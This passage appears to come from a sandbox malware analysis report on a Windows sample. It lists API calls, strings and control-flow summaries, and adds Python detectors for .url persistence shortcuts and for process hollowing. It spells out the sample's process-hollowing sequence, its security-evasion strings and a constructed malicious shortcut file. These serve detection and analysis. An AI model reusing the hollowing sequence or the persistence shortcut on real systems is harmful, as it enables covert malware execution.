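The String ID list above holds the pieces of an Internet Shortcut file ("[InternetShortcut]", "URL=file:"", "IconIndex=", "HotKey=", ".url") next to the staging directory C:\Users\Public\Libraries\ and the copy command C:\Windows\System32\extrac32.exe /C /Y. The report does not say where such a .url file is written, so the script below, an added example that is not part of the report or of the sample, takes the directory to check as a parameter (the user's Startup folder is the usual candidate; that is an assumption here) and flags .url files whose file: target points into those locations or names an executable. The payload file name in the constructed sample is hypothetical.

```python
"""Flag Internet Shortcut (.url) files whose target is a local payload.

Added example for this page; not part of the Joe Sandbox report or the sample.
The report's string table carries the pieces of a .url file ("[InternetShortcut]",
'URL=file:"', "IconIndex=", "HotKey=") next to C:\\Users\\Public\\Libraries\\ and
"C:\\Windows\\System32\\extrac32.exe /C /Y".  Where the sample writes such a file is
not shown, so the directory to scan is a parameter; the user's Startup folder is
the usual candidate (an assumption).
"""
from pathlib import Path
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# Prefixes taken from the report's string table, most specific first.
SUSPICIOUS_DIRS = (
    ("c:\\users\\public\\libraries\\", "target-in-public-libraries"),
    ("c:\\users\\public\\", "target-in-public"),
)
EXEC_SUFFIXES = (".exe", ".dll", ".scr", ".cmd", ".bat", ".pif")

# Constructed samples.  The first is assembled from the report's string fragments;
# "sample.exe" is a hypothetical payload name, not taken from the report.
MALICIOUS_URL_FILE = (
    "[InternetShortcut]\r\n"
    'URL=file:"C:\\Users\\Public\\Libraries\\sample.exe"\r\n'
    "IconIndex=0\r\n"
    "HotKey=0\r\n"
)
STANDARD_FORM_URL_FILE = "[InternetShortcut]\r\nURL=file:///C:/Users/Public/Libraries/sample.exe\r\n"
BENIGN_URL_FILE = "[InternetShortcut]\r\nURL=https://example.com/\r\nIconIndex=0\r\n"


def parse_url_shortcut(text: str) -> Dict[str, str]:
    """Read the [InternetShortcut] section of an INI-style .url file (keys lower-cased)."""
    section = None
    values: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, val = line.partition("=")
            values[key.strip().lower()] = val.strip()
    return values


def file_uri_to_path(url: str) -> Optional[str]:
    """Turn a file: URL into a Windows path; None for any other scheme.

    Accepts both the RFC form file:///C:/dir/x.exe and the quoted form
    file:"C:\\dir\\x.exe" that matches the 'URL=file:"' fragment in the report.
    """
    if not url.lower().startswith("file:"):
        return None
    rest = unquote(url[5:].strip().strip('"'))
    if rest.startswith("///"):
        rest = rest[3:]                   # file:///C:/...  -> C:/...
    elif rest.startswith("//"):
        rest = "\\\\" + rest[2:]          # file://server/share -> \\server\share
    return rest.replace("/", "\\")


def assess(text: str) -> List[str]:
    """Reason codes for one .url body; an empty list means nothing suspicious."""
    url = parse_url_shortcut(text).get("url")
    if not url:
        return []
    target = file_uri_to_path(url)
    if target is None:                    # http/https shortcuts are out of scope here
        return []
    low = target.lower()
    reasons: List[str] = []
    for prefix, tag in SUSPICIOUS_DIRS:
        if low.startswith(prefix):
            reasons.append(tag)
            break
    if low.endswith(EXEC_SUFFIXES):
        reasons.append("executable-target")
    if "extrac32" in low:
        reasons.append("extrac32-lolbin")
    return reasons


def scan_texts(named: Dict[str, str]) -> List[Tuple[str, List[str]]]:
    """Assess a name -> body mapping and keep only the entries with findings."""
    hits = []
    for name, body in named.items():
        reasons = assess(body)
        if reasons:
            hits.append((name, reasons))
    return hits


def scan_dir(directory: str) -> List[Tuple[str, List[str]]]:
    """Recursively check every *.url under directory (for example a Startup folder)."""
    files = {str(p): p.read_text(encoding="utf-8", errors="ignore")
             for p in Path(directory).rglob("*.url")}
    return scan_texts(files)


if __name__ == "__main__":
    for name, why in scan_texts({"startup.url": MALICIOUS_URL_FILE, "docs.url": BENIGN_URL_FILE}):
        print(name, why)
```

Real .url files are often written in a non-UTF-8 code page, which is why the reader ignores decoding errors; the parser only needs the ASCII keys and the path. Run `scan_dir()` against the Startup folder of each user profile to hunt for this persistence shape.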
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph for the function at 028E5FA0-028E8B96 (node/edge listing omitted). The graph is almost entirely straight-line: repeated groups of the string-building helpers 028C4824, 028C4964, 028C4698 and 028C47B0, each group ending in a call to the import resolver 028D7BE8. Direct API calls on the graph are GetCurrentProcess (immediately followed by 028D7968, the NtAllocateVirtualMemory wrapper), EnumSystemLocalesA and ExitProcess; sub-function calls include 028C7E18 (GetFileAttributesA), 028DC3F8 (NtCreateFile/NtWriteFile), 028C2EE0 (QueryPerformanceCounter), 028DD198, 028DC74C and 028D7F48.
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028D7BE8: LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
                                                                                                                                                                      • Part of subcall function 028C2EE0: QueryPerformanceCounter.KERNEL32 ref: 028C2EE4
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00001000,00000040,ScanBuffer,02924344,028E8FEC,OpenSession,02924344,028E8FEC,UacScan,02924344,028E8FEC,ScanBuffer,02924344,028E8FEC), ref: 028E681D
                                                                                                                                                                      • Part of subcall function 028D7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028D7975
                                                                                                                                                                      • Part of subcall function 028D7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028D797B
                                                                                                                                                                      • Part of subcall function 028D7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028D799B
                                                                                                                                                                    • EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,00000000,ScanBuffer,02924344,028E8FEC,OpenSession,02924344,028E8FEC,UacScan,02924344,028E8FEC,ScanBuffer,02924344,028E8FEC,OpenSession,02924344), ref: 028E6B4F
                                                                                                                                                                      • Part of subcall function 028C7E18: GetFileAttributesA.KERNEL32(00000000,?,028DE0EE,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanString,02924344,028E8FEC,UacScan,02924344,028E8FEC,UacInitialize), ref: 028C7E23
                                                                                                                                                                      • Part of subcall function 028DC3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028DC4CA), ref: 028DC437
                                                                                                                                                                      • Part of subcall function 028DC3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028DC471
                                                                                                                                                                      • Part of subcall function 028DC3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028DC49E
                                                                                                                                                                      • Part of subcall function 028DC3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028DC4A7
                                                                                                                                                                    • ExitProcess.KERNEL32(00000000,ScanBuffer,02924344,028E8FEC,OpenSession,02924344,028E8FEC,Initialize,02924344,028E8FEC,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC), ref: 028E8B96
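The "APIs" lists in these function records are the most useful part of the page for triage, but they are free text. The parser below is an added example, not part of the report or of Joe Sandbox, that turns such lines into records so a batch of records can be queried: direct calls versus calls reached through a sub-function, calls at the native layer, and the string literals passed as arguments (export names such as NtAllocateVirtualMemory, module paths, and the ScanBuffer/OpenSession marker strings that sit in the argument lists). The sample input is copied from this record; reading the module tag "N" as the native (ntdll) layer is an assumption.

```python
"""Parse the "APIs" annotation lines of a Joe Sandbox function record.

Added example for this page; it is not part of the report or of Joe Sandbox.
Each call line has the shape
  • [Part of subcall function <caller>: ]<api>.<module>(<args>), ref: <address>
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[^(]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX32 = re.compile(r"[0-9A-Fa-f]{8}")
# Assumption: the report writes "N" for calls resolved at the native (ntdll) layer.
NATIVE_MODULES = {"N", "NTDLL"}

# Constructed sample: call lines copied from the APIs blocks of this record.
SAMPLE = """\
• InetIsOffline.URL(00000000,00000000,028E8FB6,?,?,?,00000000,00000000), ref: 028DD604
  • Part of subcall function 028D7BE8: LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
  • Part of subcall function 028D7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
  • Part of subcall function 028D7968: GetModuleHandleW.KERNEL32(C:\\Windows\\System32\\ntdll.dll,NtAllocateVirtualMemory), ref: 028D7975
  • Part of subcall function 028D7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028D799B
  • Part of subcall function 028DC3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028DC471
  • Part of subcall function 028DC3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028DC49E
• EnumSystemLocalesA.C:\\WINDOWS\\SYSTEM32\\KERNELBASE(00000000,00000000,ScanBuffer,02924344,028E8FEC,OpenSession,02924344), ref: 028E6B4F
• ExitProcess.KERNEL32(00000000,ScanBuffer,02924344,028E8FEC,OpenSession,02924344,028E8FEC), ref: 028E8B96
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                 # address of the call instruction
    caller: Optional[str]    # sub-function that makes the call, None for a direct call


def classify_arg(arg: str) -> str:
    """'?' is an unresolved value, 8 hex digits a number/pointer, anything else a string literal."""
    if arg == "?":
        return "unknown"
    if HEX32.fullmatch(arg):
        return "value"
    return "string"


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every call line in text; headers and other lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m["args"].strip()
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m["api"], m["module"].strip(), args, m["ref"].upper(), m["caller"]))
    return calls


def direct_calls(calls: List[ApiCall]) -> List[ApiCall]:
    """Calls made by the function itself rather than by one of its sub-functions."""
    return [c for c in calls if c.caller is None]


def native_calls(calls: List[ApiCall]) -> List[ApiCall]:
    """Calls that go straight to the native API, bypassing kernel32-level wrappers."""
    return [c for c in calls if c.module.upper() in NATIVE_MODULES]


def string_args(calls: List[ApiCall]) -> Set[str]:
    """String literals seen in argument lists: export names, paths, marker strings."""
    return {a for c in calls for a in c.args if classify_arg(a) == "string"}


def by_module(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """API names grouped by the module tag, in record order."""
    table: Dict[str, List[str]] = {}
    for c in calls:
        table.setdefault(c.module, []).append(c.api)
    return table


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for mod, apis in by_module(parsed).items():
        print(f"{mod}: {', '.join(apis)}")
    print("native:", [c.api for c in native_calls(parsed)])
    print("strings:", sorted(string_args(parsed)))
```

Feeding every function record of a report through `parse_api_lines()` and collecting `string_args()` gives the export names the sample resolves at run time without reading each record by hand; `native_calls()` separates the direct ntdll usage (file I/O through NtCreateFile/NtWriteFile, memory through NtAllocateVirtualMemory) from the documented Win32 surface.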
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$AddressHandleModulePathProcProcess$AllocateAttributesCloseCounterCreateCurrentEnumExitLibraryLoadLocalesMemoryNameName_PerformanceQuerySystemVirtualWrite
                                                                                                                                                                    • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                                    • API String ID: 724724934-2845693168
                                                                                                                                                                    • Opcode ID: ef76beca8ca53d49041f824b061c20cdab2dae3797c39627b1efda3c2841cbd2
                                                                                                                                                                    • Instruction ID: 941fa8f4276cd15e88643985d115528f539bc3822492b4ae7f017f7a0891da57
                                                                                                                                                                    • Opcode Fuzzy Hash: ef76beca8ca53d49041f824b061c20cdab2dae3797c39627b1efda3c2841cbd2
                                                                                                                                                                    • Instruction Fuzzy Hash: 0B33EA3CA141689FDF60EB68D890CDE73B6AB95301F6044E9E109E7714DB70EE898F52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph
[Rendered graph for the function at 28d7f48 (legend: Executed / Not Executed); the graph image is not reproducible here. Recoverable structure: entry block 28d7f48-28d7f4b, a self-looping block 28d7f50-28d7f55, then one main path whose blocks contain, in order, CreateProcessAsUserW (28d8125-28d844d), GetThreadContext (28d84c0-28d87e6), NtReadVirtualMemory (28d87ec-28d8a4f), NtUnmapViewOfSection (28d8a55-28d8bbe), the NtAllocateVirtualMemory wrapper 28d7968 (28d8bc0, 28d8c59, 28d8dcd), two NtWriteVirtualMemory calls, SetThreadContext and NtResumeThread (all in 28d90a0-28d99a6), and seven calls to 28d7ac0 after the resume. Every API call is immediately preceded by a call to 28d7be8, the LoadLibraryW/GetModuleHandleW/GetProcAddress resolver listed under APIs below, so each import is resolved by name right before use. Every failure edge leads to the common exit block 28d99ab-28d9a15.]
APIs
  • Part of subcall function 028D7BE8: LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
  • Part of subcall function 028D7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
  • Part of subcall function 028D7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02924398,02924388,OpenSession,02924360,028D9A30,ScanString,02924360), ref: 028D8446
• GetThreadContext.KERNEL32(00000870,029243DC,ScanString,02924360,028D9A30,UacInitialize,02924360,028D9A30,ScanBuffer,02924360,028D9A30,ScanBuffer,02924360,028D9A30,UacInitialize,02924360), ref: 028D87DF
• NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00221FF8,029244B0,00000004,029244B8,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360), ref: 028D8A3C
• NtUnmapViewOfSection.N(0000088C,00400000,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,0000088C,00221FF8,029244B0,00000004,029244B8), ref: 028D8BB7
  • Part of subcall function 028D7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028D7975
  • Part of subcall function 028D7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028D797B
  • Part of subcall function 028D7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028D799B
• NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00400000,00000000,11D98300,029244B8,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,ScanBuffer,02924360), ref: 028D920B
• NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00221FF8,029244B4,00000004,029244B8,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,0000088C,00400000), ref: 028D937E
• SetThreadContext.KERNEL32(00000870,029243DC,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,0000088C,00221FF8,029244B4,00000004,029244B8), ref: 028D94F4
• NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000870,00000000,00000870,029243DC,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,0000088C,00221FF8,029244B4), ref: 028D9501
  • Part of subcall function 028D7AC0: LoadLibraryW.KERNEL32(bcrypt,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360,028D9A30,UacInitialize,02924360,028D9A30,00000870,029243DC,ScanString,02924360,028D9A30), ref: 028D7AD2
  • Part of subcall function 028D7AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028D7ADF
  • Part of subcall function 028D7AC0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360,028D9A30,UacInitialize), ref: 028D7AF6
  • Part of subcall function 028D7AC0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360,028D9A30,UacInitialize,02924360,028D9A30,00000870,029243DC), ref: 028D7B05
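The API list above is the process-hollowing sequence behind the report's "Sample uses process hollowing technique" signature: CreateProcessAsUserW with dwCreationFlags 00000004 (CREATE_SUSPENDED, the seventh argument), GetThreadContext on the new primary thread (handle 00000870), a 4-byte NtReadVirtualMemory from the child (handle 0000088C) at 00221FF8, NtUnmapViewOfSection of the child's own image at 00400000, NtAllocateVirtualMemory through the 028D7968 wrapper, NtWriteVirtualMemory of the replacement image at 00400000 and of 4 bytes back into 00221FF8, then SetThreadContext and NtResumeThread. Reading and rewriting the same 4-byte slot around the unmap is the PEB.ImageBaseAddress update (offset 8 of the 32-bit PEB, which puts the child's PEB at 00221FF0). The 028D7AC0 subcall, called once per resolved export after the resume, loads a DLL in the parent (bcrypt / BCryptVerifySignature in the listed instance), and writes a single byte (length 00000001) into the same child handle 0000088C at an address the static argument dump does not resolve; the report establishes only that bytes are written into the child after its image has been replaced, not what they do. The detector below is an added example, not part of the Joe Sandbox report and not the sample's code: it parses API lines in this report's format, takes the process and thread handles from the calls that follow a CREATE_SUSPENDED create (PROCESS_INFORMATION is not visible in the static dump), and reports the sequence only when every stage lands on that one handle pair in order. TRACE is an abbreviated copy of the lines above with the trailing stack residue dropped; the stage names and the Hollowing record are the example's own.

```python
"""Flag the process-hollowing API sequence in Joe Sandbox-style call lines.
Added example: not part of the Joe Sandbox report and not the sample's code.
TRACE is an abbreviated copy of the report's API list for the function at
0x028D7F48 (handles, addresses and ref values as printed, stack residue dropped).
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

CREATE_SUSPENDED = 0x00000004       # dwCreationFlags bit of CreateProcess*
PEB_IMAGE_BASE_OFFSET_X86 = 0x8     # PEB.ImageBaseAddress in the 32-bit PEB

TRACE = r"""
CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02924398,02924388), ref: 028D8446
GetThreadContext.KERNEL32(00000870,029243DC), ref: 028D87DF
NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00221FF8,029244B0,00000004,029244B8), ref: 028D8A3C
NtUnmapViewOfSection.N(0000088C,00400000), ref: 028D8BB7
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028D799B
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00400000,00000000,11D98300,029244B8), ref: 028D920B
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00221FF8,029244B4,00000004,029244B8), ref: 028D937E
SetThreadContext.KERNEL32(00000870,029243DC), ref: 028D94F4
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000870,00000000), ref: 028D9501
"""

# "<Api>.<module>(<args>), ref: <addr>"; the module part is free text in the report
LINE_RE = re.compile(r"^(?P<api>\w+)\.[^(]*\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")

@dataclass
class Call:
    api: str
    args: List[Optional[int]]   # None where the report prints '?'
    ref: int

@dataclass
class Hollowing:
    process_handle: int
    thread_handle: int
    original_image_base: Optional[int]   # address passed to NtUnmapViewOfSection
    peb_image_base_slot: Optional[int]   # 4-byte slot read before and rewritten after the unmap
    inferred_peb: Optional[int]          # slot minus ImageBaseAddress offset (x86 PEB layout assumed)
    stages: List[Tuple[str, int]] = field(default_factory=list)   # (stage, ref) in trace order

def parse_trace(text: str) -> List[Call]:
    calls = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        args = [None if a == "?" else int(a, 16) for a in m["args"].split(",") if a]
        calls.append(Call(m["api"], args, int(m["ref"], 16)))
    return calls

def detect_hollowing(calls: List[Call]) -> List[Hollowing]:
    """One finding per CREATE_SUSPENDED CreateProcess* followed, on a single process/thread
    handle pair, by GetThreadContext, NtUnmapViewOfSection, a write to the unmapped base,
    SetThreadContext and NtResumeThread, in that order."""
    required = ["GetThreadContext", "NtUnmapViewOfSection", "NtWriteVirtualMemory(image)",
                "SetThreadContext", "NtResumeThread"]
    findings = []
    for i, c in enumerate(calls):
        if not c.api.startswith("CreateProcess"):
            continue
        # dwCreationFlags is the 7th argument of CreateProcessAsUser*, the 6th of CreateProcessA/W
        flags_idx = 6 if c.api.startswith("CreateProcessAsUser") else 5
        if len(c.args) <= flags_idx or not c.args[flags_idx] or not c.args[flags_idx] & CREATE_SUSPENDED:
            continue
        tail = calls[i + 1:]
        # PROCESS_INFORMATION is not in the static dump: take the handles from the first
        # thread-context call and the first child-memory operation after the create
        thread = next((t.args[0] for t in tail if t.api == "GetThreadContext" and t.args), None)
        process = next((t.args[0] for t in tail
                        if t.api in ("NtUnmapViewOfSection", "NtWriteVirtualMemory") and t.args), None)
        if thread is None or process is None:
            continue
        stages = [("CreateProcess*", c.ref)]
        unmapped_base = read_slot = peb_slot = None
        for t in tail:
            a = t.args
            if not a:
                continue
            if t.api == "GetThreadContext" and a[0] == thread:
                stages.append((t.api, t.ref))
            elif t.api == "NtReadVirtualMemory" and a[0] == process and len(a) > 3 and a[3] == 4:
                read_slot = a[1]                    # 4-byte read: candidate image-base pointer
            elif t.api == "NtUnmapViewOfSection" and a[0] == process:
                unmapped_base = a[1]
                stages.append((t.api, t.ref))
            elif t.api == "NtWriteVirtualMemory" and a[0] == process and len(a) > 3:
                if unmapped_base is not None and a[1] == unmapped_base:
                    stages.append(("NtWriteVirtualMemory(image)", t.ref))
                elif read_slot is not None and a[1] == read_slot and a[3] == 4:
                    peb_slot = a[1]                 # same slot rewritten: PEB.ImageBaseAddress
                    stages.append(("NtWriteVirtualMemory(PEB.ImageBaseAddress)", t.ref))
            elif t.api == "SetThreadContext" and a[0] == thread:
                stages.append((t.api, t.ref))
            elif t.api == "NtResumeThread" and a[0] == thread:
                stages.append((t.api, t.ref))
                break
        if [s for s, _ in stages if s in required] != required:
            continue
        peb = peb_slot - PEB_IMAGE_BASE_OFFSET_X86 if peb_slot is not None else None
        findings.append(Hollowing(process, thread, unmapped_base, peb_slot, peb, stages))
    return findings

if __name__ == "__main__":
    for h in detect_hollowing(parse_trace(TRACE)):
        print(f"hollowing: process {h.process_handle:#x} thread {h.thread_handle:#x} "
              f"image base {h.original_image_base:#x} PEB {h.inferred_peb:#x}")
        for stage, ref in h.stages:
            print(f"  {ref:08X}  {stage}")
```

The order check is deliberate: NtUnmapViewOfSection, NtWriteVirtualMemory and SetThreadContext each occur in benign tooling (debuggers, loaders), and the signal is the full chain on one suspended child. The PEB inference assumes a 32-bit child, which matches the 4-byte slot size and the 00400000 image base in this trace; a 64-bit PEB keeps ImageBaseAddress at offset 0x10 and the slot would be 8 bytes wide.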
Strings
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc$IC
• API String ID: 2533507481-3678116285
• Opcode ID: e13fbc2e5187c067a6d4eb1615973825d935f6bd9c94059bd2d8175c84120eff
• Instruction ID: d8768a27114563571300a46970df8984c817cb96695e9db04836b5f74240a4bc
• Opcode Fuzzy Hash: e13fbc2e5187c067a6d4eb1615973825d935f6bd9c94059bd2d8175c84120eff
• Instruction Fuzzy Hash: 1EE2EC3DA101789BDB51EBA8D890EDE73B6AF45701F2081A5E109E7314DB70EE89CF52
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
[Rendered graph for the function at 28d7f46 (legend: Executed / Not Executed); the graph image is not reproducible here. The function is a second entry two bytes before 28d7f48 into the same body: entry block 28d7f46-28d7f4b, self-looping block 28d7f50-28d7f55, then the same main path with CreateProcessAsUserW (28d8125-28d844d), GetThreadContext (28d84c0-28d87e6), NtReadVirtualMemory (28d87ec-28d8a4f), NtUnmapViewOfSection (28d8a55-28d8bbe), the NtAllocateVirtualMemory wrapper 28d7968, two NtWriteVirtualMemory calls, SetThreadContext and NtResumeThread (28d90a0-28d99a6) and seven calls to 28d7ac0, each API call preceded by the 28d7be8 resolver, and every failure edge leading to the common exit block 28d99ab-28d9a15.]
APIs
  • Part of subcall function 028D7BE8: LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
  • Part of subcall function 028D7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
  • Part of subcall function 028D7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02924398,02924388,OpenSession,02924360,028D9A30,ScanString,02924360), ref: 028D8446
• GetThreadContext.KERNEL32(00000870,029243DC,ScanString,02924360,028D9A30,UacInitialize,02924360,028D9A30,ScanBuffer,02924360,028D9A30,ScanBuffer,02924360,028D9A30,UacInitialize,02924360), ref: 028D87DF
• NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00221FF8,029244B0,00000004,029244B8,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360), ref: 028D8A3C
• NtUnmapViewOfSection.N(0000088C,00400000,ScanBuffer,02924360,028D9A30,ScanString,02924360,028D9A30,Initialize,02924360,028D9A30,0000088C,00221FF8,029244B0,00000004,029244B8), ref: 028D8BB7
  • Part of subcall function 028D7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028D7975
  • Part of subcall function 028D7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028D797B
  • Part of subcall function 028D7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028D799B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
